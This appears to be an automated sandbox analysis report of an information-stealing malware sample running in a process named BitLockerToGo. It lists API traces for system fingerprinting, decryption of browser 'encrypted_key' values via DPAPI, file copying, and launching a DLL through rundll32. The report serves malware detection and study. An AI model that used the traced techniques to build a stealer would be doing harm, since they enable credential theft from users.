                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,02A12877,02A127B4,?,?,?,02A15BD2,Windows: ,02A378E0), ref: 02A12819
                                                                                                                                                                                                                                                                                                                                                          • RtlAllocateHeap.NTDLL(00000000), ref: 02A12820
                                                                                                                                                                                                                                                                                                                                                          • RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,02A378C8,?,?,?,02A12877,02A127B4,?,?,?,02A15BD2,Windows: ,02A378E0), ref: 02A1283E
                                                                                                                                                                                                                                                                                                                                                          • RegQueryValueExA.KERNEL32(02A378C8,CurrentBuildNumber,00000000,00000000,00000000,000000FF,?,?,?,02A12877,02A127B4,?,?,?,02A15BD2,Windows: ), ref: 02A12859
                                                                                                                                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(02A378C8,?,?,?,02A12877,02A127B4,?,?,?,02A15BD2,Windows: ,02A378E0), ref: 02A12862
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3357688139.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a00000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                                                                                                                                                                                                                                                                                                                                          • String ID: CurrentBuildNumber
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3225020163-1022791448
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: c2903e25035a540dab7414a0bc2b6caa0bac6f37120135a03609ba9ceb5eea93
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: f5e7c6befdb9b9e412e7966dc3e6f3cbfce1c587b7f40cbc1857ad20b13e8447
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c2903e25035a540dab7414a0bc2b6caa0bac6f37120135a03609ba9ceb5eea93
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B8F01D79A80204BBEB119B90DC4BFAB7AB9EB44B50F100554FB01A5084DBB05A619A51
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • _memset.LIBCMT ref: 02A173DF
                                                                                                                                                                                                                                                                                                                                                          • RegOpenKeyExA.KERNEL32(80000001,00000000,00020119,?,?,00000000,?), ref: 02A173FF
                                                                                                                                                                                                                                                                                                                                                          • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,000000FF), ref: 02A17425
                                                                                                                                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 02A17431
                                                                                                                                                                                                                                                                                                                                                          • lstrcat.KERNEL32(?,?), ref: 02A17460
                                                                                                                                                                                                                                                                                                                                                          • lstrcat.KERNEL32(?), ref: 02A17473
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3357688139.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a00000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: lstrcat$CloseOpenQueryValue_memset
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3891774339-0
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12143: lstrcpy.KERNEL32(00000000,00000000), ref: 02A12169
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A09148: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,02A0F752,?,?,?), ref: 02A09163
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A09148: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,02A0F752,?,?,?), ref: 02A0917A
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A09148: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,02A0F752,?,?,?), ref: 02A09191
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A09148: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,02A0F752,?,?,?), ref: 02A091A8
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A09148: CloseHandle.KERNEL32(?,?,?,?,?,02A0F752,?,?,?), ref: 02A091D0
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A13A7B: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,02A18680,?), ref: 02A13A93
                                                                                                                                                                                                                                                                                                                                                          • StrStrA.SHLWAPI(00000000,"encrypted_key":",?,?,?,?,?,?), ref: 02A093EE
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A091FF: LocalAlloc.KERNEL32(00000040,?,00000001,?,?,?,?,02A0665F,00000000,?), ref: 02A09239
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A092A6: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,02A09456), ref: 02A092C9
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A092A6: LocalAlloc.KERNEL32(00000040,02A09456,?,?,02A09456,?,02A0DC56,?,?,?,?,?,?), ref: 02A092DD
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A092A6: LocalFree.KERNEL32(?,?,?,02A09456,?,02A0DC56,?,?,?,?,?,?), ref: 02A09302
                                                                                                                                                                                                                                                                                                                                                          • lstrlen.KERNEL32(00000001,?,?,?,?,?,?), ref: 02A0947F
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12265: lstrlen.KERNEL32(?,?,?,02A18FD9,abc_,00000000,02A37786,?,?,?,?,02A19D6E), ref: 02A12279
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12265: lstrcpy.KERNEL32(00000000,?), ref: 02A122A1
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12265: lstrcat.KERNEL32(?,00000000), ref: 02A122AC
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A18BE6: CreateThread.KERNEL32(00000000,00000000,02A18B15,?,00000000,00000000), ref: 02A18C85
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A18BE6: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 02A18C8D
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3357688139.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a00000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Local$Alloc$File$Createlstrcpylstrlen$CloseCryptDataFreeHandleObjectReadSingleSizeThreadUnprotectWaitlstrcat
                                                                                                                                                                                                                                                                                                                                                          • String ID: $"encrypted_key":"$DPAPI$_key.txt
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2040183763-3468172165
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,02A0F752,?,?,?), ref: 02A09163
                                                                                                                                                                                                                                                                                                                                                          • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,02A0F752,?,?,?), ref: 02A0917A
                                                                                                                                                                                                                                                                                                                                                          • LocalAlloc.KERNEL32(00000040,?,?,?,?,?,02A0F752,?,?,?), ref: 02A09191
                                                                                                                                                                                                                                                                                                                                                          • ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,02A0F752,?,?,?), ref: 02A091A8
                                                                                                                                                                                                                                                                                                                                                          • LocalFree.KERNEL32(02A0FCF9,?,?,?,?,02A0F752,?,?,?), ref: 02A091C7
                                                                                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,?,02A0F752,?,?,?), ref: 02A091D0
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3357688139.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a00000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2311089104-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 4bdf7b20ca0e2629543850e17f1c80b8f0c4a43d1170a175ca7cc5239699f27d
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 41d1b4ce790fad3edb59acb19302a47c52cbf32dfa9a2b6f817e7ed1a93a9f15
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4bdf7b20ca0e2629543850e17f1c80b8f0c4a43d1170a175ca7cc5239699f27d
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 04114CB4A00205EBDB219FA4ECCDFAF7BB5FB84B50F100958F941A2180DB309A95DB11
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,001E5D70,00003000,00000004), ref: 02A0109A
                                                                                                                                                                                                                                                                                                                                                          • _memset.LIBCMT ref: 02A010C0
                                                                                                                                                                                                                                                                                                                                                          • VirtualFree.KERNEL32(00000000,001E5D70,00008000), ref: 02A010D6
                                                                                                                                                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,02A19CAB), ref: 02A010F0
                                                                                                                                                                                                                                                                                                                                                          • VirtualAllocExNuma.KERNEL32(00000000), ref: 02A010F7
                                                                                                                                                                                                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 02A01102
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3357688139.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Virtual$AllocProcess$CurrentExitFreeNuma_memset
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1859398019-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 7bd2adef7b7e717fad959453394dab23ad27ebe6020d1c1f2fb9b91a9a8866c6
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 5dffedf690be7917e719092f3d26af60847267dd943b1b8c8ada567f80223961
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7bd2adef7b7e717fad959453394dab23ad27ebe6020d1c1f2fb9b91a9a8866c6
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 56F0AF76BC126076E22416752C9EFAB2A6CAB42B66F204414F30CFA2C0DE61D8158664
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12143: lstrcpy.KERNEL32(00000000,00000000), ref: 02A12169
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12265: lstrlen.KERNEL32(?,?,?,02A18FD9,abc_,00000000,02A37786,?,?,?,?,02A19D6E), ref: 02A12279
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12265: lstrcpy.KERNEL32(00000000,?), ref: 02A122A1
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12265: lstrcat.KERNEL32(?,00000000), ref: 02A122AC
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A121E9: lstrcpy.KERNEL32(00000000,?), ref: 02A12219
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A138A6: GetSystemTime.KERNEL32(?,02A37807,?), ref: 02A138D5
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12223: lstrcpy.KERNEL32(00000000,?), ref: 02A12251
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12223: lstrcat.KERNEL32(?,?), ref: 02A1225B
                                                                                                                                                                                                                                                                                                                                                          • ShellExecuteEx.SHELL32(?), ref: 02A147D6
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3357688139.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: lstrcpy$lstrcat$ExecuteShellSystemTimelstrlen
                                                                                                                                                                                                                                                                                                                                                          • String ID: "" $.dll$C:\ProgramData\$C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2215929589-2108736111
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 2dbfc926a1741bf2e2cdc8a4160b4f3aac34c4f6cbd4aee2d50f8f29ad8595b8
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 3f3ba93541b6c353c0ab74e64e03d6ace377c5a0d88939d7b681301f824a6390
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2dbfc926a1741bf2e2cdc8a4160b4f3aac34c4f6cbd4aee2d50f8f29ad8595b8
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5E71D872D802299ADF11EBA5EE85BCDB7B6AF04314F114461EE14B7160DF31AF4A8F90
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • lstrcat.KERNEL32(?,?), ref: 02A17BD5
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A13A18: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 02A13A59
                                                                                                                                                                                                                                                                                                                                                          • lstrcat.KERNEL32(?,00000000), ref: 02A17BF2
                                                                                                                                                                                                                                                                                                                                                          • lstrcat.KERNEL32(?,?), ref: 02A17C11
                                                                                                                                                                                                                                                                                                                                                          • lstrcat.KERNEL32(?,?), ref: 02A17C25
                                                                                                                                                                                                                                                                                                                                                          • lstrcat.KERNEL32(?), ref: 02A17C38
                                                                                                                                                                                                                                                                                                                                                          • lstrcat.KERNEL32(?,?), ref: 02A17C4C
                                                                                                                                                                                                                                                                                                                                                          • lstrcat.KERNEL32(?), ref: 02A17C5F
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12143: lstrcpy.KERNEL32(00000000,00000000), ref: 02A12169
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A139EE: GetFileAttributesA.KERNEL32(?,?,?,02A0EA72,?,?,?), ref: 02A139F5
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A1785A: GetProcessHeap.KERNEL32(00000000,0098967F,?,?,?), ref: 02A1787F
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A1785A: RtlAllocateHeap.NTDLL(00000000), ref: 02A17886
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A1785A: wsprintfA.USER32 ref: 02A1789F
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A1785A: FindFirstFileA.KERNEL32(?,?), ref: 02A178B6
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A1785A: StrCmpCA.SHLWAPI(?,02A37AD8), ref: 02A178D7
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A1785A: StrCmpCA.SHLWAPI(?,02A37ADC), ref: 02A178F1
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A1785A: wsprintfA.USER32 ref: 02A17918
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A1785A: CopyFileA.KERNEL32(?,?,00000001), ref: 02A179D5
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A1785A: DeleteFileA.KERNEL32(?), ref: 02A179F8
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3357688139.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
• Associated: 00000003.00000002.3357729051.0000000002A31000.00000002.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.3357757392.0000000002A3E000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.3357757392.0000000002A64000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.3357757392.0000000002A8D000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.3357757392.0000000002A9F000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.3357757392.0000000002AA2000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.3357757392.0000000002AA8000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.3357757392.0000000002AE6000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.3357757392.0000000002B9A000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.3357757392.0000000002C41000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.3358124521.0000000002C53000.00000002.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a00000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: lstrcat$File$Heapwsprintf$AllocateAttributesCopyDeleteFindFirstFolderPathProcesslstrcpy
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3709078413-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 8daa86d444eba2f1a3a81516fcf5565e55386175fb37bdc3b99079a1a0d3aef0
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 9a6a15c0d57a5001eb8d635a8de900ed3bdaeda7a6b4509da3ddafe454a564a3
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8daa86d444eba2f1a3a81516fcf5565e55386175fb37bdc3b99079a1a0d3aef0
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3F51FAB5E4011C9BCB54DB64DC95ADDBBF9AB4C310F4048E6EB09E3250EA30AF998F54
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • _memset.LIBCMT ref: 02A1332A
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A1421B: malloc.MSVCRT ref: 02A14220
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A1421B: strncpy.MSVCRT ref: 02A14231
                                                                                                                                                                                                                                                                                                                                                          • lstrcat.KERNEL32(?,00000000), ref: 02A13352
                                                                                                                                                                                                                                                                                                                                                          • lstrcat.KERNEL32(?,02A37E68), ref: 02A1336F
                                                                                                                                                                                                                                                                                                                                                          • GetCurrentHwProfileA.ADVAPI32(?), ref: 02A132FB
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12143: lstrcpy.KERNEL32(00000000,00000000), ref: 02A12169
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3357688139.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
• Associated: 00000003.00000002.3357729051.0000000002A31000.00000002.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.3357757392.0000000002A3E000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.3357757392.0000000002A64000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.3357757392.0000000002A8D000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.3357757392.0000000002A9F000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.3357757392.0000000002AA2000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.3357757392.0000000002AA8000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.3357757392.0000000002AE6000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.3357757392.0000000002B9A000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.3357757392.0000000002C41000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.3358124521.0000000002C53000.00000002.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a00000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: lstrcat$CurrentProfile_memsetlstrcpymallocstrncpy
                                                                                                                                                                                                                                                                                                                                                          • String ID: Unknown
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2781187439-1654365787
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 885570d614381a96fc2af086539022a73e84ca40e97c00a7e35a361d0304008e
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 78f1bfa81a958008688347ceab9f405879decc186edcfcd1cc33f3725ecfe49b
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 885570d614381a96fc2af086539022a73e84ca40e97c00a7e35a361d0304008e
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A1112B71E80228ABDB11EB64DE85BD9B7B9AB04710F1004E1BA49E7150DE70AF888F54
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000104,?,Keyboard Languages: ,02A37950,Display Resolution: ,02A37934,00000000,User Name: ,02A37924,00000000,Computer Name: ,02A37910,AV: ,02A37904,Install Date: ), ref: 02A12D8D
                                                                                                                                                                                                                                                                                                                                                          • RtlAllocateHeap.NTDLL(00000000), ref: 02A12D94
                                                                                                                                                                                                                                                                                                                                                          • GlobalMemoryStatusEx.KERNEL32(?,?,00000040), ref: 02A12DB0
                                                                                                                                                                                                                                                                                                                                                          • wsprintfA.USER32 ref: 02A12DD6
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3357688139.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357729051.0000000002A31000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A3E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A64000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A8D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A9F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AE6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002B9A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002C41000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3358124521.0000000002C53000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a00000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Heap$AllocateGlobalMemoryProcessStatuswsprintf
                                                                                                                                                                                                                                                                                                                                                          • String ID: %d MB
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2922868504-2651807785
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 7afdc14d3b66060573a9a77f1ff62d90257130a574effd51985f9d8364917a04
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: ec3c7941c408567ea3321d3c7c2018243543e6ea598f1e51a7d9f90d89522846
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7afdc14d3b66060573a9a77f1ff62d90257130a574effd51985f9d8364917a04
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CB014FB5E40218ABEB14DFA4D946BBE77E8EF04311F44092AFD02E6140DA7499118A65
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 02A04A10
                                                                                                                                                                                                                                                                                                                                                          • ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 02A04A16
                                                                                                                                                                                                                                                                                                                                                          • ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 02A04A1C
                                                                                                                                                                                                                                                                                                                                                          • lstrlen.KERNEL32(000000FF,00000000,?), ref: 02A04A2E
                                                                                                                                                                                                                                                                                                                                                          • InternetCrackUrlA.WININET(000000FF,00000000), ref: 02A04A36
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3357688139.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a00000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: CrackInternetlstrlen
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1274457161-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: bd3d733947e55ca2b5f273b1b8ea2bbc8a4f58d1d8f0d035f3f6444152b3e4b7
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 973ca3243c95d96594516c983f542bf4fc255ff22c7d6ccffdca6b3a79eaa5cd
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bd3d733947e55ca2b5f273b1b8ea2bbc8a4f58d1d8f0d035f3f6444152b3e4b7
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1D011E35D00218ABCB149BA9DC45ADEBFB8AF55330F108616F925E72E0DB746601CF94
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,02A15F8F,Processor: ,[Hardware],02A37990,00000000,TimeZone: ,02A37980,00000000,Local Time: ,02A3796C), ref: 02A12BC1
                                                                                                                                                                                                                                                                                                                                                          • RtlAllocateHeap.NTDLL(00000000), ref: 02A12BC8
                                                                                                                                                                                                                                                                                                                                                          • RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,02A378C8,?,?,?,02A15F8F,Processor: ,[Hardware],02A37990,00000000,TimeZone: ,02A37980,00000000,Local Time: ), ref: 02A12BE6
                                                                                                                                                                                                                                                                                                                                                          • RegQueryValueExA.KERNEL32(02A378C8,00000000,00000000,00000000,000000FF,?,?,?,02A15F8F,Processor: ,[Hardware],02A37990,00000000,TimeZone: ,02A37980,00000000), ref: 02A12C02
